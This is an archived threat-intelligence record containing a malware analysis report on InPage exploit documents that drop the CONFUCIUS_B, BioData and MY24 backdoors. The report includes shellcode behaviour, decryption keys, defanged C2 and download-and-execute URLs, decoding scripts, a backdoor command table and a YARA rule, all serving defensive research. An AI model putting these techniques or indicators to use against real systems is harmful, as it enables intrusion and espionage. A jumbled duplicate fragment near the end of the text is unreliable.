{ "id": "49537509-5ac1-47c1-a004-7ffcd99c338d", "created_at": "2026-04-06T00:18:11.279099Z", "updated_at": "2026-04-10T03:33:38.165759Z", "deleted_at": null, "sha1_hash": "6918d5cba6ccf1aef4eb5fecb7b514215f19e6ee", "title": "Recent InPage Exploits Lead to Multiple Malware Families", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2531276, "plain_text": "Recent InPage Exploits Lead to Multiple Malware Families\r\nBy Jacob Soo, Josh Grunzweig\r\nPublished: 2017-11-02 · Archived: 2026-04-05 13:23:06 UTC\r\nIn recent weeks, Unit 42 has discovered three documents crafted to exploit the InPage program. InPage is a word\r\nprocessor program that supports languages such as Urdu, Persian, Pashto, and Arabic. The three InPage exploit\r\nfiles are linked through their use of very similar shellcode, which suggests that either the same actor is behind\r\nthese attacks, or the attackers have access to a shared builder. The documents were found to drop the following\r\nmalware families:\r\nThe previously discussed CONFUCIUS_B malware family\r\nA backdoor previously not discussed in the public domain, commonly detected by some antivirus solutions\r\nas “BioData”\r\nA previously unknown backdoor that we have named MY24\r\nThe use of InPage as an attack vector is not commonly seen, with the only previously noted attacks being\r\ndocumented by Kaspersky in late 2016.\r\nThe decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily\r\nmotivated. They contained subjects such as intelligence reports and political situations related to India, the\r\nKashmir region, or terrorism being used as lure documents.\r\nIn the blog below, we analyze and present our findings on three of these malicious InPage documents:\r\nCyber Advisory No 91.inp\r\nIntelligence Report-561 (1).inp\r\nTehreek-E-Kashmir Mujahaid List.inp\r\nWe also include analysis of the new backdoor we discovered: MY24.\r\n \r\nCyber Advisory No 91.inp\r\nWe discovered the first InPage exploit to have the following attributes:\r\nSHA256 1d1e7a6175e6c514aaeca8a43dabefa017ddc5b166ccb636789b6a767181a022\r\nOriginal Filename Cyber Advisory No 91.inp\r\nThe exploit for this document is the same one described by described by Kaspersky late last year. This exploit was\r\nunsuccessful in the latest version in InPage (Version 3.60), and as such the underlying vulnerability has likely\r\nbeen patched.\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 1 of 15\n\nOverall, the entire execution flow of this malware from start to finish can be summarized as follows:\r\nFigure 1 InPage exploit document execution flow\r\n \r\nWhen the malicious .INP file is opened using a vulnerable version of InPage, it will execute the shellcode that is\r\nembedded within it.\r\nThis particular shellcode, along with the shellcode found within another InPage exploit document that will be\r\ndiscussed later on, began with a marker of ‘LuNdLuNd’, followed by a series of NOPs. It continues to identify an\r\noffset to an embedded executable file, which will eventually be run on the victim machine.\r\nThis particular shellcode uses a unique hashing mechanism for identifying and loading Microsoft Windows\r\nlibraries and functions. It uses this method to load a series of functions, as seen below:\r\nFigure 2 Shellcode loading functions using custom hashing algorithm\r\n \r\nThe hashing algorithm in question can be represented in Python as follows:\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 2 of 15\n\ndef hashAlgo(string):\r\n  hsh = 0\r\n  for c in string:\r\n    v1 = ord(c) | 0x60\r\n    hsh = 2 * (hsh + v1)\r\n  return hsh\r\nlibrary = \"ntdll.dll\"\r\nfunction = \"memcpy\"\r\nprint \"[+] '{}' Library: 0x{:x}\".format(library, hashAlgo(library))\r\nprint \"[+] '{}' Function: 0x{:x}\".format(function, hashAlgo(function))\r\nOutput:\r\n[+] 'ntdll.dll' Library: 0x1b708\r\n[+] 'memcpy' Function: 0x347a\r\nThis particular hashing algorithm does not appear to be widely used, however, in our searches using the YARA\r\nrule provided at the end of this blog, we were able to identify roughly 70 PE32 samples that have recently\r\nemployed this same hashing technique.\r\nThe shellcode then proceeds to attempt to create a mutex with a value of “QPONMLKJIH” to ensure only one\r\ninstance of the shellcode is running at a given time. Finally, the shellcode will copy the embedded payload into\r\nnewly allocated memory before executing it.\r\nThis newly dropped payload is a DLL with the following attributes:\r\nSHA256 7bbf14ced3ca490179d3727b7287eb581c3a730131331be042d0f0510bc804f9\r\nCompile Timestamp 2015-05-08 12:51:54 UTC\r\nPDB String c:\\users\\mz\\documents\\visual studio 2013\\Projects\\Shellcode\\Release\\Shellcode.pdb\r\n \r\nThis particular DLL acts as a dropper, and has two embedded resource files—an executable payload that will be\r\nused to ultimately drop the final payload, as well as a decoy InPage file. It begins by spawning a new thread that\r\nloads the two files from embedded resources with names of ‘BIN’ and ‘BIN2’ respectively. The executable is\r\ndropped to the following path before it is executed:\r\n%TEMP%\\winopen.exe\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 3 of 15\n\nThe InPage decoy document is dropped to the following path before it is run:\r\n%TEMP\\SAMPLE.INP\r\nThe decoy document in question looks like the following. The rough translation to English has been provided in\r\nred:\r\nFigure 3 Decoy InPage file with rough translation\r\n \r\nBased on the rough translation of this document, it appears to deal with current issues within the Kashmir region.\r\nThis of course is not consistent with the original filename, and it is unclear why this is the case. Perhaps the\r\nattacker forgot to change the lure from a previous exploit, or simply didn’t find it necessary. This lure, while\r\ninconsistent with the original filename, is in line with the other InPage exploit file that also looked to be of the\r\nsame subject matter.\r\nThe executable file in the ‘%TEMP%\\winopen.exe’ path has the following attributes:\r\nSHA256 692815d06b720669585a71bc8151b89ca6748f882b35e365e08cfaf6eda77049\r\nCompile Timestamp 2017-07-31 06:03:42 UTC\r\n \r\nThis particular executable is made to resemble the legitimate application Putty. Unlike other files we witnessed up\r\nto this point, this sample has rudimentary anti-debugging and anti-analysis techniques in place prior to the main\r\nexecution flow.\r\nIt proceeds to decrypt an embedded resource object using the RC4 algorithm. The following key is used for\r\ndecryption:\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 4 of 15\n\nVACqItywGR1v3qGxVZQPYXxMZV0o2fzp\r\nAfter this data is decrypted, the following registry key is written to ensure persistence. Again, we see the malware\r\nmimic the appearance of the legitimate Putty application.\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Putty - %TEMP%\\winopen.exe\r\nFinally, the malware will spawn a new suspended instance of itself, where the decrypted data is written and\r\nsubsequently executed.\r\nThis next stage of malware has the following properties:\r\nSHA256 bb5540fe0bbc0cda08865aad891a585cd465b224bfe84762216cd04178087516\r\nCompile Timestamp 2017-05-17 05:47:05 UTC\r\n \r\nThis malware operates almost identical to the previously witnessed sample. However, this time the embedded\r\nresource object is decrypted using the following RC4 key:\r\nkRPAnN2DN6vfrxsJ55Lntnh7Mma8E68s\r\nThe next, and last stage of this malware execution has the following attributes:\r\nSHA256 d1a14bc3160f5ed6232ceaf40de1959d7dba3eae614efd2882b04d538cda825b\r\nCompile Timestamp 2016-10-31 02:41:09 UTC\r\n \r\nThis final payload is an instance of the CONFUCIUS_B malware family, which we have previously discussed.\r\nThis particular sample attempts to connect to the following host for C2 operations:\r\n151.80.14[.]194\r\nIntelligence Report-561 (1).inp\r\nWe identified this malicious InPage document as having the following attributes:\r\nSHA256 35c5f6030513f11fd1dcf9bd232de457ba7f3af3aedc0e2e976895b296a09df6\r\nOriginal Filename Intelligence Report-561 (1).inp\r\n \r\nThis particular exploit file uses the exact same shellcode witnessed previously, where an embedded DLL is loaded\r\ninto memory. Again, this executable drops and executes two files—a Microsoft Windows executable payload and\r\nan InPage decoy document.\r\nThe embedded payload within the shellcode has the following attributes:\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 5 of 15\n\nSHA256 83e3b2938ee6a3e354c93c6ec756da96b03cc69118b5748b07aee4d900da1844\r\nCompile Timestamp 2015-05-08 12:51:54 UTC\r\nPDB String c:\\users\\mz\\documents\\visual studio 2013\\Projects\\Shellcode\\Release\\Shellcode.pdb\r\n \r\nAgain, we see the executable payload and decoy document dropped to the following respective locations:\r\n%TEMP%\\winopen.exe\r\n%TEMP%\\SAMPLE.inp\r\nThe dropped executable is a previously undocumented backdoor written in Delphi that has been named BioData\r\nby multiple antivirus organizations.\r\nThis InPage exploit document follows a much simpler execution flow, as seen in the following diagram.\r\nFigure 4 InPage exploit execution flow\r\n \r\nThe decoy InPage file dropped by this malware looks like the following. The language used within it appears to be\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 6 of 15\n\na mix of Arabic and Urdu. A rough translation has been provided in red in the image below.\r\nFigure 5 Decoy InPage document dropped by malware\r\n \r\nThe Biodata payload has the following attributes:\r\nSHA256 5716509e4cdbf8ffa5fbce02b8881320cb852d98e590215455986a5604a453f7\r\nCompile Timestamp 1992-06-19 22:22:17 UTC\r\n \r\nNote that the timestamp above is the result of this sample being compiled in Delphi, which uses the same\r\nhardcoded compilation timestamp for all samples that are generated.\r\nThroughout the execution of this sample, numerous strings are decoded using a customized 94-character\r\nsubstitution table. BioData will go through each character of the obfuscated string, and will replace each character\r\nbased on the following table:\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 7 of 15\n\nFigure 6 Substitution table used by BioData\r\n \r\nThe malware proceeds to generate and create a ‘Document’ folder within the %USERPROFILE% directory. This\r\nfolder will contain all of the malware’s files throughout its execution. In order to maintain persistence, the\r\nmalware will generate the following file in the startup folder, which points to the current path of the BioData\r\nexecutable:\r\nAdobe creative suit.lnk\r\nBioData proceeds to generate a randomized 30-character string of uppercase and lowercase letters. This string is\r\nwritten to the following file:\r\n%USERPROFILE%\\Document\\users.txt\r\nThis 30-character string is used by the malware to act as a unique identifier for the victim, and will be used for all\r\nnetwork communication with a remote server.\r\nThe username and computer name are identified, and are written to a string of the following format:\r\nUser name and System Name :- [Username]_[Computer Name]\r\nThis data is obfuscated and written to the following file:\r\n%USERPROFILE%\\Document\\SyLog.log\r\nIn order to obfuscate this data, the malware uses a unique algorithm. Represented in Python, the following script\r\nwill decode this file:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\nimport sys\r\nfrom binascii import *\r\nfile = sys.argv[1]\r\nfh = open(file, 'rb')\r\nfd = fh.read()\r\nfh.close()\r\ndef bit_not(n, numbits=8):\r\n  return (1 \u003c\u003c numbits) - 1 - n\r\ndef decode(data):\r\n  c = 0\r\n  output = \"\"\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 8 of 15\n\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n  for d in data:\r\n    o = bit_not((0x6121 \u003e\u003e c) \u0026 0xFF)\r\n    output += chr(ord(d) ^ o)\r\n    c += 1\r\n    if c == 32:\r\n      c = 0\r\n  return output\r\nprint decode(fd)\r\nBioData sends both GET and POST requests to the following URL:\r\nhttp://errorfeedback[.]com/MarkQuality455/developerbuild.php\r\nPOST requests are made with a hardcoded User-Agent, shown below in Figure 7. Additionally, a ‘b’ GET\r\nparameter is included that contains the victim’s previously generated unique identifier. The contents of the POST\r\nrequests are the obfuscated SyLog.log file. The remote C2 server has been observed responding to these requests\r\nwith ‘Success’. These requests simply act as a beacon, including the basic victim information that was previously\r\nobtained.\r\nFigure 7 HTTP POST request by BioData\r\n \r\nGET requests are made in a slightly different fashion. These requests contain an empty User-Agent, and are also\r\nfound to be missing a number of HTTP headers that are commonly seen.\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 9 of 15\n\nFigure 8 HTTP GET request by BioData\r\n \r\nUnlike the POST requests, the malware both looks for and makes use of the response given, if any, by the C2\r\nserver. The malware parses any response given by first hex-decoding it. It then base64-decodes the resulting\r\nstring. The final string is used to form a subsequent GET request.\r\nIf for instance, the malware responded with a decoded string of ‘malware.exe’, the subsequent GET request would\r\nlook like the following:\r\nhttp://errorfeedback[.]com/MarkQuality455/bzGwXILtkMRZaJxzciXAeCYviduBuy/malware.exe\r\nThe request above uses the same victim identifier that has been observed in the previous examples provided.\r\nThis hypothetical ‘malware.exe’ request contains the raw contents of the payload that BioData will drop to disk\r\nand execute. The contents are placed in the following file path for this hypothetical:\r\n%USERPROFILE%\\Document\\malware.exe\r\nFinally, after this dropped payload is successfully executed, the malware will send a GET request such as the\r\nfollowing:\r\nhttp://errorfeedback[.]com/MarkQuality455/developerbuild.php?\r\nf=62574673643246795a53356c654755\u0026b=bzGwXILtkMRZaJxzciXAeCYviduBuy\r\nIn the above example, the ‘b’ parameter is the victim identifier, and the ‘f’ parameter is the string of ‘malware.exe’\r\nafter it has been base64-encoded and hex-encoded. This request alerts the attack that the hypothetical payload of\r\n‘malware.exe’ has been run.\r\nTehreek-E-Kashmir Mujahaid List.inp\r\nWe identified this malicious InPage document as having the following attributes:\r\nSHA256 3e410397955d5a127182d69e019dbc8bbffeee864cd9c96e577c9c13f05a232f\r\nOriginal Filename Tehreek-E-Kashmir Mujahaid List.inp\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 10 of 15\n\nUnfortunately, no decoy document was included with this exploit file. However, the filename provides clues as to\r\nthe context that may have been present when this file was delivered to the intended recipient. The phrase\r\n‘Tehreek-E-Kashmir’ is most likely related to the conflict in the Kashmir region of India. Additionally, the term\r\n‘Mujahaid’ may be a misspelling of the word ‘Mujahid’, a term used to describe an individual engaged in Jihad.\r\nThis particular InPage shellcode looks to be near identical to the two others previously discussed, however, it\r\nappears as though the attackers simply partially overwrote the original shellcode that was present to substitute\r\ntheir own. This results in the shellcode acting as a downloader, instead of loading an embedded payload. We can\r\nsee the modifications visually in the following image:\r\nFigure 9 Differences between InPage exploit documents\r\n \r\nIn the image above, the ‘Cyber Advisory No 91.inp’ exploit file has the large additional size, as it included the\r\npayload. The ‘Tehreek-E-Kashmir Mujahaid List.inp’ exploit file instead has removed this. However, original\r\nartifacts from the original shellcode are still present, including the function that loads Microsoft Windows API\r\ncalls using the unique hashing algorithm.\r\nThe shellcode begins by iterating through the Process Environment Block (PEB), searching for a loaded module\r\nthat has a ‘3’ in the 7th position. In other words, the shellcode uses a simple trick to search for kernel32.dll. It\r\nproceeds to iterate through kernel32’s functions, looking for the GetProcAddress function. In order to find this\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 11 of 15\n\nfunction it will compare the first four letters against ‘GetP’, and the third set of four letters against ‘ddre’.\r\nThe shellcode then gets the address of the WinExec function, which in turn is used to execute the following\r\ncommand:\r\ncmd /c mkdir C:\\Wins\r\nIt then performs the following:\r\n1. Gets the address of the LoadLibraryA function\r\n2. Loads the urlmon.dll library\r\n3. Gets the address of the URLDownloadToFileA function\r\nThe shellcode then proceeds to make a request to the following URL and download the response to ‘C:\\Wins\\cnh’.\r\nhttp://zmwardrobe[.]com/wp-sign\r\nFinally, the shellcode will execute this downloaded file via a call to WinExec.\r\nThe response from this webserver returned a payload, that we have named MY24, with the following attributes:\r\nSHA256 71b7de2e3a60803df1c3fdc46af4fd8cfb7c803a53c9a85f7311348f6ff88cbe\r\nCompile Timestamp 2017-05-18 05:26:54 UTC\r\n \r\nIt should also be noted that a malicious Microsoft Word document with the following properties was observed\r\ndownloading and executing the same payload.\r\nSHA256 3f1d3d02e7707b2bc686b5add875e1258c65a0facd5cf8910ba0f321e230e17c\r\nOriginal Filename Las Vegas ISIS Claim Proof.doc\r\nFirst Seen 2017-10-05 05:53:27\r\n \r\nMY24 Analysis\r\nThis backdoor begins by decoding a series of embedded strings by adding 33 to each character. The following\r\nexample within the Python interpreter demonstrates this:\r\nFigure 10 Example string decoding within Python interpreter\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 12 of 15\n\nThe malware proceeds to execute a function that is responsible for generating the following path:\r\n%APPDATA%\\Startup\\wintasks.exe\r\nHowever, this path is never used, leading us to believe that the malware author had the intention of copying the\r\npayload to this destination and likely setting persistence, but seemingly forgot to.\r\nMY24 proceeds to spawn two timers where the functions are responsible for resolving the C2 domain of\r\nuserveblog.ddns[.]net, as well as connecting to this domain.\r\nTwo new threads are then created—one for handling any data that is received from the connection to the C2 and\r\none that is responsible for sending out data.\r\nFinally, a function is called that is responsible for collecting information about the victim machine. The following\r\ninformation is collected:\r\nVersion of Microsoft Windows\r\nUsername\r\nComputer name\r\nThe MY24 instance expects to receive a command initially from the remote server of userveblog.ddns[.]net on\r\nport 9832. All communication is performed using raw sockets via a custom communication protocol. The packets\r\nreceived by the malware have the following format:\r\nFigure 11 Received packet format for MY24 malware\r\n \r\nAll data received and sent by MY24 is encrypted using a 13-byte XOR key of \"t6%9k$2Ri9ctv\". The data portion\r\nof the received command will include one of the following commands:\r\nReceived Command Description\r\n2000 Return victim information\r\n2001 Get drive information\r\n2002 List files\r\n2004 Unknown\r\n2005 Create file handle to append data\r\n2006 Write appended data to previously created file handle\r\n2007 Create file handle for reading data\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 13 of 15\n\n2009 Read data from previously created file handle\r\n2012 Spawn a shell of cmd.exe\r\n2013 Interact with previously spawned shell\r\n2015 Unknown\r\n2016 Kill previously spawned shell\r\n2019 List current process network communication on the victim machine\r\n2021 Unknown\r\n2022 Kill process\r\n2023 Enumerate processes\r\n2025 Unknown\r\n \r\nResponses sometimes vary in size, but are primarily sent with a size of 9084 bytes. The author of this tool did not\r\nallocate proper buffer size when sending out the data, resulting in part of the stack being included in the response\r\nby the MY24 malware. Examples of commands being sent and received may be seen below. A custom server was\r\nwritten to interact with the MY24 malware, which is seen in the following image.\r\n \r\nFigure 12 Interacting with MY24 backdoor\r\nConclusion\r\nWhile documents designed to exploit the InPage software are rare, they are not new - however in recent weeks\r\nUnit42 has observed numerous InPage exploits leveraging similar shellcode, suggesting continued use of the\r\nexploit previously discussed by Kaspersky.\r\nThe decoy documents dropped suggest that the targets are likely to be politically or militarily motivated, with\r\nsubjects such as Intelligence reports and political situations being used as lure documents. The variety of malware\r\npayloads dropped suggests the attackers behind these attacks have a reasonable development resource behind them\r\nand Unit42 continues to observe new versions of these malware families being created.\r\nPalo Alto Networks customers are protected against these threats in a number of ways:\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 14 of 15\n\nAll domains observed in these malware families have been flagged as malicious.\r\nAll payloads are appropriately categorized as malicious within the WildFire platform and blocked by Traps.\r\nThe payloads witnessed have been tagged in AutoFocus as Confucius_B, MY24, and BioData for\r\ncontinued tracking and observation.\r\nAppendix\r\nYARA Rules\r\nrule InPageShellcodeHashing\r\n{\r\nstrings:\r\n$hashingFunction = {55 8B EC 51 53 52 33 C9 33 DB 33 D2 8B 45 08 8A 10 80 CA 60 03 DA D1 E3 03\r\n45 10 8A 08 84 C9 E0 EE 33 C0 8B 4D 0C 3B D9 74 01 40 5A 5B 59 8B E5 5D C2 0C 00}\r\ncondition:\r\n$hashingFunction\r\n}\r\nSource: https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 15 of 15\n\ncalls using the The shellcode unique hashing begins by iterating algorithm. through the Process Environment Block (PEB), searching for a loaded module\nthat has a ‘3’ in the 7th position. In other words, the shellcode uses a simple trick to search for kernel32.dll. It\nproceeds to iterate through kernel32’s functions, looking for the GetProcAddress function. In order to find this\n Page 11 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/" ], "report_names": [ "unit42-recent-inpage-exploits-lead-multiple-malware-families" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4", "created_at": "2025-08-07T02:03:25.123407Z", "updated_at": "2026-04-10T02:00:03.668131Z", "deleted_at": null, "main_name": "ZINC EMERSON", "aliases": [ "Confucius ", "Dropping Elephant ", "EHDevel ", "Manul ", "Monsoon ", "Operation Hangover ", "Patchwork ", "TG-4410 ", "Viceroy Tiger " ], "source_name": "Secureworks:ZINC EMERSON", "tools": [ "Enlighten Infostealer", "Hanove", "Mac OS X KitM Spyware", "Proyecto2", "YTY Backdoor" ], "source_id": "Secureworks", "reports": null }, { "id": "7a8dbc5e-51a8-437a-8540-7dcb1cc110b8", "created_at": "2022-10-25T16:07:23.482856Z", "updated_at": "2026-04-10T02:00:04.627414Z", "deleted_at": null, "main_name": "Confucius", "aliases": [ "G0142" ], "source_name": "ETDA:Confucius", "tools": [ "ApacheStealer", "ByeByeShell", "ChatSpy", "Confucius", "MY24", "Sneepy", "remote-access-c3", "sctrls", "sip_telephone", "swissknife2" ], "source_id": "ETDA", "reports": null }, { "id": "caf95a6f-2705-4293-9ee1-6b7ed9d9eb4c", "created_at": "2022-10-25T15:50:23.472432Z", "updated_at": "2026-04-10T02:00:05.352882Z", "deleted_at": null, "main_name": "Confucius", "aliases": [ "Confucius", "Confucius APT" ], "source_name": "MITRE:Confucius", "tools": [ "WarzoneRAT" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434691, "ts_updated_at": 1775792018, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6918d5cba6ccf1aef4eb5fecb7b514215f19e6ee.pdf", "text": "https://archive.orkl.eu/6918d5cba6ccf1aef4eb5fecb7b514215f19e6ee.txt", "img": "https://archive.orkl.eu/6918d5cba6ccf1aef4eb5fecb7b514215f19e6ee.jpg" } }